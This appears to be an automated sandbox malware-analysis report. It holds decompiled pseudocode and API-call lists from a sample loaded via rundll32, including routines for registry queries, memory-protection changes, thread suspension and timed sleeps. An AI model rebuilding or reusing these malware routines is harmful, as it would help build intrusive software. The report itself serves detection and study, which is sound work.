                            							_t36 = RtlAllocateHeap( *0x4a1a2d8, 0, 0x43);
                            							 *0x4a1a368 = _t36;
                            							__eflags = _t36;
                            							if(_t36 == 0) {
                            								_push(8);
                            								_pop(0);
                            							} else {
                            								_t56 =  *0x4a1a2fc; // 0x4000000a
                            								_t61 = _t56 & 0x000000ff;
                            								_t58 =  *0x4a1a348; // 0xb1d5a8
                            								_t13 = _t58 + 0x4a1b552; // 0x697a6f4d
                            								_t55 = _t13;
                            								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4a19287);
                            							}
                            							_t54 = 0;
                            							__eflags = 0;
                            							if(0 == 0) {
                            								asm("sbb eax, eax");
                            								E04A13365( ~_v8 &  *0x4a1a310, 0x4a1a00c); // executed
                            								_t42 = E04A11645(0, _t55, _t63, 0x4a1a00c); // executed
                            								_t54 = _t42;
                            								__eflags = _t54;
                            								if(_t54 != 0) {
                            									goto L30;
                            								}
                            								_t43 = E04A13981(); // executed
                            								__eflags = _t43;
                            								if(_t43 != 0) {
                            									__eflags = _v8;
                            									_t67 = _v12;
                            									if(_v8 != 0) {
                            										L29:
                            										_t44 = E04A1661D(_t61, _t67, _v8); // executed
                            										_t54 = _t44;
                            										goto L30;
                            									}
                            									__eflags = _t67;
                            									if(__eflags == 0) {
                            										goto L30;
                            									}
                            									_t54 = E04A1529C(__eflags,  &(_t67[4]));
                            									__eflags = _t54;
                            									if(_t54 == 0) {
                            										goto L30;
                            									}
                            									goto L29;
                            								}
                            								_t54 = 8;
                            							}
                            						}
                            					} else {
                            						_t68 = _v12;
                            						if(_t68 == 0) {
                            							L30:
                            							if(_v16 == 0 || _v16 == 1) {
                            								 *0x4a1a17c(); // executed
                            							}
                            							goto L34;
                            						}
                            						_t69 =  &(_t68[4]);
                            						do {
                            						} while (E04A17928(_t63, _t69, 0, 1) == 0x4c7);
                            					}
                            					goto L30;
                            				} else {
                            					_t54 = _t22;
                            					L34:
                            					return _t54;
                            				}
                            			}

                            APIs
                              • Part of subcall function 04A13CFD: GetModuleHandleA.KERNEL32(4C44544E,00000000,04A13D44,00000001), ref: 04A13D0C
                            • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04A13DC1
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • memset.NTDLL ref: 04A13E11
                            • RtlInitializeCriticalSection.NTDLL(05539570), ref: 04A13E22
                              • Part of subcall function 04A1529C: memset.NTDLL ref: 04A152B6
                              • Part of subcall function 04A1529C: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04A152FC
                              • Part of subcall function 04A1529C: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 04A15307
                            • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04A13E4D
                            • wsprintfA.USER32 ref: 04A13E7D
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
• Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                            • String ID:
                            • API String ID: 4246211962-0
                            • Opcode ID: 6e9e185440a620a404668ad7eb13f0a8c1563f06bd5b075d2314621d270fa44a
                            • Instruction ID: a55ac6ca517e7a68993423865e026fc4e27692f90f821fe85311ed53f8d0acaa
                            • Opcode Fuzzy Hash: 6e9e185440a620a404668ad7eb13f0a8c1563f06bd5b075d2314621d270fa44a
                            • Instruction Fuzzy Hash: 3451A171B01324ABFF11AFA4DC94BAE77B8EB14714F044869E902DB1B0E775B9458B50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 22%
                            			E04A119E2(signed int __eax, signed int _a4, signed int _a8) {
                            				signed int _v8;
                            				signed int _v12;
                            				intOrPtr _v16;
                            				signed int _v20;
                            				intOrPtr _t81;
                            				char _t83;
                            				signed int _t90;
                            				signed int _t97;
                            				signed int _t99;
                            				char _t101;
                            				unsigned int _t102;
                            				intOrPtr _t103;
                            				char* _t107;
                            				signed int _t110;
                            				signed int _t113;
                            				signed int _t118;
                            				signed int _t122;
                            				intOrPtr _t124;
                            
                            				_t102 = _a8;
                            				_t118 = 0;
                            				_v20 = __eax;
                            				_t122 = (_t102 >> 2) + 1;
                            				_v8 = 0;
                            				_a8 = 0;
                            				_t81 = E04A16D63(_t122 << 2);
                            				_v16 = _t81;
                            				if(_t81 == 0) {
                            					_push(8);
                            					_pop(0);
                            					L37:
                            					return 0;
                            				}
                            				_t107 = _a4;
                            				_a4 = _t102;
                            				_t113 = 0;
                            				while(1) {
                            					_t83 =  *_t107;
                            					if(_t83 == 0) {
                            						break;
                            					}
                            					if(_t83 == 0xd || _t83 == 0xa) {
                            						if(_t118 != 0) {
                            							if(_t118 > _v8) {
                            								_v8 = _t118;
                            							}
                            							_a8 = _a8 + 1;
                            							_t118 = 0;
                            						}
                            						 *_t107 = 0;
                            						goto L16;
                            					} else {
                            						if(_t118 != 0) {
                            							L10:
                            							_t118 = _t118 + 1;
                            							L16:
                            							_t107 = _t107 + 1;
                            							_t15 =  &_a4;
                            							 *_t15 = _a4 - 1;
                            							if( *_t15 != 0) {
                            								continue;
                            							}
                            							break;
                            						}
                            						if(_t113 == _t122) {
                            							L21:
                            							if(_a8 <= 0x20) {
                            								_push(0xb);
                            								L34:
                            								_pop(0);
                            								L35:
                            								E04A16C2C(_v16);
                            								goto L37;
                            							}
                            							_t24 = _v8 + 5; // 0xcdd8d2f8
                            							_t103 = E04A16D63((_v8 + _t24) * _a8 + 4);
                            							if(_t103 == 0) {
                            								_push(8);
                            								goto L34;
                            							}
                            							_t90 = _a8;
                            							_a4 = _a4 & 0x00000000;
                            							_v8 = _v8 & 0x00000000;
                            							_t124 = _t103 + _t90 * 4;
                            							if(_t90 <= 0) {
                            								L31:
                            								 *0x4a1a318 = _t103;
                            								goto L35;
                            							}
                            							do {
                            								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                            								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                            								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                            								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                            								_v12 = _v12 & 0x00000000;
                            								if(_a4 <= 0) {
                            									goto L30;
                            								} else {
                            									goto L26;
                            								}
                            								while(1) {
                            									L26:
                            									_t99 = _v12;
                            									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                            									if(_t99 == 0) {
                            										break;
                            									}
                            									_v12 = _v12 + 1;
                            									if(_v12 < _a4) {
                            										continue;
                            									}
                            									goto L30;
                            								}
                            								_v8 = _v8 - 1;
                            								L30:
                            								_t97 = _a4;
                            								_a4 = _a4 + 1;
                            								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                            								__imp__(_t124);
                            								_v8 = _v8 + 1;
                            								_t124 = _t124 + _t97 + 1;
                            							} while (_v8 < _a8);
                            							goto L31;
                            						}
                            						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                            						_t101 = _t83;
                            						if(_t83 - 0x61 <= 0x19) {
                            							_t101 = _t101 - 0x20;
                            						}
                            						 *_t107 = _t101;
                            						_t113 = _t113 + 1;
                            						goto L10;
                            					}
                            				}
                            				if(_t118 != 0) {
                            					if(_t118 > _v8) {
                            						_v8 = _t118;
                            					}
                            					_a8 = _a8 + 1;
                            				}
                            				goto L21;
                            			}

                            APIs
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • lstrcpy.KERNEL32(69B25F45,00000020), ref: 04A11ADF
                            • lstrcat.KERNEL32(69B25F45,00000020), ref: 04A11AF4
                            • lstrcmp.KERNEL32(00000000,69B25F45), ref: 04A11B0B
                            • lstrlen.KERNEL32(69B25F45), ref: 04A11B2F
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                            • String ID:
                            • API String ID: 3214092121-3916222277
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E04A1498E(signed int _a4, signed int* _a8) {
                            				void* __ecx;
                            				void* __edi;
                            				signed int _t6;
                            				intOrPtr _t8;
                            				intOrPtr _t12;
                            				long _t14;
                            				void* _t18;
                            				WCHAR* _t19;
                            				long _t20;
                            				void* _t25;
                            				signed int* _t28;
                            				CHAR* _t30;
                            				long _t31;
                            				WCHAR** _t32;
                            
                            				_t6 =  *0x4a1a310; // 0xd448b889
                            				_t32 = _a4;
                            				_a4 = _t6 ^ 0x109a6410;
                            				_t8 =  *0x4a1a348; // 0xb1d5a8
                            				_t3 = _t8 + 0x4a1b87a; // 0x61636f4c
                            				_t25 = 0;
                            				_t30 = E04A111C3(_t3, 1);
                            				if(_t30 != 0) {
                            					_t25 = CreateEventA(0x4a1a34c, 1, 0, _t30);
                            					E04A16C2C(_t30);
                            				}
                            				_t12 =  *0x4a1a2fc; // 0x4000000a
                            				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0) {
                            					L12:
                            					_t28 = _a8;
                            					if(_t28 != 0) {
                            						 *_t28 =  *_t28 | 0x00000001;
                            					}
                            					_t14 = E04A1402A(_t32, 0); // executed
                            					_t31 = _t14;
                            					if(_t31 == 0 && _t25 != 0) {
                            						_t31 = WaitForSingleObject(_t25, 0x4e20);
                            					}
                            					if(_t28 != 0 && _t31 != 0) {
                            						 *_t28 =  *_t28 & 0xfffffffe;
                            					}
                            					goto L20;
                            				} else {
                            					_t18 = E04A168BD(); // executed
                            					if(_t18 != 0) {
                            						goto L12;
                            					}
                            					_t19 = StrChrW( *_t32, 0x20);
                            					if(_t19 != 0) {
                            						 *_t19 = 0;
                            						_t19 =  &(_t19[1]);
                            					}
                            					_t20 = E04A17928(0,  *_t32, _t19, 0); // executed
                            					_t31 = _t20;
                            					if(_t31 == 0) {
                            						if(_t25 == 0) {
                            							L22:
                            							return _t31;
                            						}
                            						_t31 = WaitForSingleObject(_t25, 0x4e20);
                            						if(_t31 == 0) {
                            							L20:
                            							if(_t25 != 0) {
                            								FindCloseChangeNotification(_t25); // executed
                            							}
                            							goto L22;
                            						}
                            					}
                            					goto L12;
                            				}
                            			}

                            APIs
                              • Part of subcall function 04A111C3: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05539D70,00000000,?,?,69B25F44,00000005,04A1A00C,4D283A53,?,?), ref: 04A111F9
                              • Part of subcall function 04A111C3: lstrcpy.KERNEL32(00000000,00000000), ref: 04A1121D
                              • Part of subcall function 04A111C3: lstrcat.KERNEL32(00000000,00000000), ref: 04A11225
                            • CreateEventA.KERNEL32(04A1A34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,04A17187,?,?,?), ref: 04A149CF
                              • Part of subcall function 04A16C2C: RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            • StrChrW.SHLWAPI(04A17187,00000020,61636F4C,00000001,00000000,?,?,00000000,?,04A17187,?,?,?), ref: 04A14A02
                            • WaitForSingleObject.KERNEL32(00000000,00004E20,04A17187,00000000,00000000,?,00000000,?,04A17187,?,?,?), ref: 04A14A2F
                            • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,04A17187,?,?,?), ref: 04A14A5D
                            • FindCloseChangeNotification.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,04A17187,?,?,?), ref: 04A14A75
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: ObjectSingleWait$ChangeCloseCreateEventFindFreeHeapNotificationlstrcatlstrcpylstrlen
                            • String ID:
                            • API String ID: 3294472205-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F7B7A4: RegCreateKeyA.ADVAPI32(80000001,0631B7F0,?), ref: 04F7B7B9
                              • Part of subcall function 04F7B7A4: lstrlen.KERNEL32(0631B7F0,00000000,00000000,00000000,?,04F7A2EB,00000001,?,00000000,00000000,00000000,?,04F6109E,04F89F2C,00000008,00000003), ref: 04F7B7E2
                            • RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F02
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F81F16
                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?), ref: 04F81F30
                            • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000,?,?,?,04F62C89,?,?,?), ref: 04F81F4C
                            • RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,04F62C89,?,?,?), ref: 04F81F5A
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                            • String ID:
                            • API String ID: 1633053242-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleHandleA.KERNEL32(?,?,?,?,?,04F6111D,00000000), ref: 04F7214D
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F72166
                            • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,04F6111D,00000000), ref: 04F72183
                            • IsWow64Process.KERNEL32(?,?,?,?,?,?,04F6111D,00000000), ref: 04F72194
                            • FindCloseChangeNotification.KERNEL32(?,?,?,?,04F6111D,00000000), ref: 04F721A7
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$AddressChangeCloseFindHandleModuleNotificationOpenProcWow64
                            • String ID:
                            • API String ID: 1712524627-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • VirtualProtect.KERNEL32(?,?,00000040,?,?,?,00000000), ref: 04F633CA
                            • GetLastError.KERNEL32(?,00000000), ref: 04F633D2
                            • VirtualQuery.KERNEL32(?,?,0000001C,?,00000000), ref: 04F633E9
                            • VirtualProtect.KERNEL32(?,?,-2C9B417C,?,?,00000000), ref: 04F6340E
                            • SetLastError.KERNEL32(80000000,?,00000000), ref: 04F63417
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$ErrorLastProtect$Query
                            • String ID:
                            • API String ID: 148356745-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • memset.NTDLL ref: 04F7ED35
                            • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 04F7EDBF
                            • WaitForSingleObject.KERNEL32(00000064), ref: 04F7EDCD
                            • SuspendThread.KERNEL32(?), ref: 04F7EDE0
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                            • String ID:
                            • API String ID: 3168247402-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SysAllocString.OLEAUT32(80000002), ref: 04A1755B
                            • SysAllocString.OLEAUT32(04A13520), ref: 04A1759F
                            • SysFreeString.OLEAUT32(00000000), ref: 04A175B3
                            • SysFreeString.OLEAUT32(00000000), ref: 04A175C1
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: String$AllocFree
                            • String ID:
                            • API String ID: 344208780-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 41%
                            			E04A170D8(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                            				intOrPtr _v12;
                            				void* _v16;
                            				void* _v28;
                            				char _v32;
                            				void* __esi;
                            				void* _t20;
                            				void* _t26;
                            				void* _t29;
                            				void* _t38;
                            				signed int* _t39;
                            				void* _t40;
                            
                            				_t36 = __ecx;
                            				_v32 = 0;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				_v12 = _a4;
                            				_t20 = E04A154BB(__ecx,  &_v32); // executed
                            				_t38 = _t20;
                            				if(_t38 != 0) {
                            					L12:
                            					_t39 = _a8;
                            					L13:
                            					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                            						_t23 =  &(_t39[1]);
                            						if(_t39[1] != 0) {
                            							E04A178BF(_t23);
                            						}
                            					}
                            					return _t38;
                            				}
                            				_t26 = E04A13695(0x40,  &_v16); // executed
                            				if(_t26 != 0) {
                            					_v16 = 0;
                            				}
                            				_t40 = CreateEventA(0x4a1a34c, 1, 0,  *0x4a1a3e4);
                            				if(_t40 != 0) {
                            					SetEvent(_t40);
                            					Sleep(0xbb8); // executed
                            					FindCloseChangeNotification(_t40); // executed
                            				}
                            				_push( &_v32);
                            				if(_a12 == 0) {
                            					_t29 = E04A171B6(_t36); // executed
                            				} else {
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_t29 = E04A13472(_t36);
                            				}
                            				_t41 = _v16;
                            				_t38 = _t29;
                            				if(_v16 != 0) {
                            					E04A13AC2(_t41);
                            				}
                            				if(_t38 != 0) {
                            					goto L12;
                            				} else {
                            					_t39 = _a8;
                            					_t38 = E04A1498E( &_v32, _t39);
                            					goto L13;
                            				}
                            			}

                            APIs
                            • CreateEventA.KERNEL32(04A1A34C,00000001,00000000,00000040,?,?,7620F710,00000000,7620F730), ref: 04A17129
                            • SetEvent.KERNEL32(00000000), ref: 04A17136
                            • Sleep.KERNEL32(00000BB8), ref: 04A17141
                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 04A17148
                              • Part of subcall function 04A171B6: RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,04A17168,?), ref: 04A171DC
                              • Part of subcall function 04A171B6: RegEnumKeyExA.KERNEL32(?,?,?,04A17168,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,04A17168), ref: 04A17223
                              • Part of subcall function 04A171B6: WaitForSingleObject.KERNEL32(00000000,?,?,?,04A17168,?,04A17168,?,?,?,?,?,04A17168,?), ref: 04A17290
                              • Part of subcall function 04A171B6: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,04A17168,?), ref: 04A172B8
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: CloseEvent$ChangeCreateEnumFindNotificationObjectOpenSingleSleepWait
                            • String ID:
                            • API String ID: 780868161-0
                            • Opcode ID: 1b6b6ee73703d2fb9ee4ac067596721efdf777a1ae5c21dd054fb40f24bc1ad1
                            • Instruction ID: 1a086c440fb95c5f9d4aa7a201fd80fb64573cfde5e5cc2d3912cde101d27869
                            • Opcode Fuzzy Hash: 1b6b6ee73703d2fb9ee4ac067596721efdf777a1ae5c21dd054fb40f24bc1ad1
                            • Instruction Fuzzy Hash: 0121A476D01129ABEF20AFE4C984CEFB7BDEB48354B054425EA51A7130D734B945CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E04A112CA(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
                            				long _t26;
                            				intOrPtr* _t38;
                            				char* _t42;
                            				long _t43;
                            
                            				if(_a4 == 0) {
                            					L2:
                            					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
                            					_t43 = _t26;
                            					if(_t43 == 0) {
                            						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
                            						if(_a4 == 0) {
                            							_t43 = 0xe8;
                            						} else {
                            							_t42 = E04A16D63(_a4);
                            							if(_t42 == 0) {
                            								_t43 = 8;
                            							} else {
                            								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
                            								if(_t43 != 0) {
                            									E04A16C2C(_t42);
                            								} else {
                            									 *_a20 = _t42;
                            									_t38 = _a24;
                            									if(_t38 != 0) {
                            										 *_t38 = _a4;
                            									}
                            								}
                            							}
                            						}
                            						RegCloseKey(_a12); // executed
                            					}
                            					L12:
                            					return _t43;
                            				}
                            				_t43 = E04A16500(_a4, _a8, _a12, _a16, _a20, _a24);
                            				if(_t43 == 0) {
                            					goto L12;
                            				}
                            				goto L2;
                            			}

                            APIs
                            • RegOpenKeyW.ADVAPI32(80000002,05539E92,05539E92), ref: 04A11303
                            • RegQueryValueExW.KERNEL32(05539E92,?,00000000,80000002,00000000,00000000,?,04A13551,3D04A190,80000002,04A17168,00000000,04A17168,?,05539E92,80000002), ref: 04A11325
                            • RegQueryValueExW.ADVAPI32(05539E92,?,00000000,80000002,00000000,00000000,00000000,?,04A13551,3D04A190,80000002,04A17168,00000000,04A17168,?,05539E92), ref: 04A1134A
                            • RegCloseKey.KERNEL32(05539E92,?,04A13551,3D04A190,80000002,04A17168,00000000,04A17168,?,05539E92,80000002,00000000,?), ref: 04A1137A
                              • Part of subcall function 04A16500: SafeArrayDestroy.OLEAUT32(00000000), ref: 04A16588
                              • Part of subcall function 04A16C2C: RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                            • String ID:
                            • API String ID: 486277218-0
                            • Opcode ID: eda5fc03513ce694b4a24f7ba63f5d62cd0a62f50148382bcb9a9a5dd923763f
                            • Instruction ID: 5cef806f5c77bec7b7ff97eae4bca2d83f204067d34be900dece3769c8bb71f6
                            • Opcode Fuzzy Hash: eda5fc03513ce694b4a24f7ba63f5d62cd0a62f50148382bcb9a9a5dd923763f
                            • Instruction Fuzzy Hash: 8421397250015EBFDF129F94DC84CEE7BA9FB08290B018426FE559A530D632ED60DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,04F662DD,?,?,?,?), ref: 04F79686
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04F7969D
                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,04F662DD,?,?,?,?,?,?,00000000), ref: 04F796B8
                            • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,04F662DD,?,?,?,?), ref: 04F796D7
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HeapQueryValue$AllocateFree
                            • String ID:
                            • API String ID: 4267586637-0
                            • Opcode ID: d3c44dc66a2a889bebb9f8041f77071bdfd1539f40d86ba601228a0dc8031eb3
                            • Instruction ID: b238c6ff206bcd035198e028af098a2797a495fc22ea31af16bdc151105a549f
                            • Opcode Fuzzy Hash: d3c44dc66a2a889bebb9f8041f77071bdfd1539f40d86ba601228a0dc8031eb3
                            • Instruction Fuzzy Hash: BF111FB690011CFFDB129F95DC84CEEBBBDEB89750F10415AF905A6210E2B56E41EB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 65%
                            			E04A14B89(void* __ecx, intOrPtr _a4) {
                            				struct _FILETIME _v12;
                            				int _t13;
                            				signed int _t16;
                            				void* _t18;
                            				signed int _t19;
                            				unsigned int _t23;
                            				void* _t30;
                            				signed int _t34;
                            
                            				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                            				asm("stosd");
                            				do {
                            					_t13 = SwitchToThread();
                            					GetSystemTimeAsFileTime( &_v12);
                            					_t23 = _v12.dwHighDateTime;
                            					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                            					_push(0);
                            					_push(0x13);
                            					_push(_t23 >> 5);
                            					_push(_t16);
                            					L04A183A6();
                            					_t34 = _t16 + _t13;
                            					_t18 = E04A15D2E(_a4, _t34);
                            					_t30 = _t18;
                            					_t19 = 3;
                            					Sleep(_t19 << (_t34 & 0x00000007)); // executed
                            				} while (_t30 == 1);
                            				return _t30;
                            			}

                            APIs
                            • SwitchToThread.KERNEL32(?,00000001,?,?,?,04A11D14,?,?), ref: 04A14B9A
                            • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,04A11D14,?,?), ref: 04A14BA6
                            • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 04A14BBF
                              • Part of subcall function 04A15D2E: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 04A15D8D
                            • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,04A11D14,?,?), ref: 04A14BDE
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
